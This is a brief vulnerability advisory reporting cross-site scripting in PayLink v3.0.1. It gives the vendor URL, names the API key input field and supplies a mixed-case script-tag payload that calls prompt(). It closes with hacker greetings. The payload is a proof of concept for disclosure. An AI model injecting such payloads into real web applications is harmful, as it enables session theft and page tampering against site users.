PayLink version 3.0.1 suffers from a cross site scripting vulnerability.
2504a2d85364e37969093891ff6d7a35
============================================================================
| # Title : PayLink v3.0.1 XSS Vulnerability |
| # Author : indoushka |
| # email : [email protected] |
| # Tested on : windows 10 FranASSais V.(Pro) |
| # Version : v3.0.1 |
| # Vendor : https://code.condize.com//pay/ |
| # Dork : n/a |
============================================================================
poc :
[+] Dorking Adegn Google Or Other Search Enggine
[+] Go 2 : ( razorpay ) https://code.condize.com/pay/index.php#razorpay
[+] use payload : in razorpay api key box <ScRiPt>prompt(00213771818860)</ScRiPt>
item name box = use any
amount in inr = use any
& click in generate link
https://code.condize.com/pay/p87iM2
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================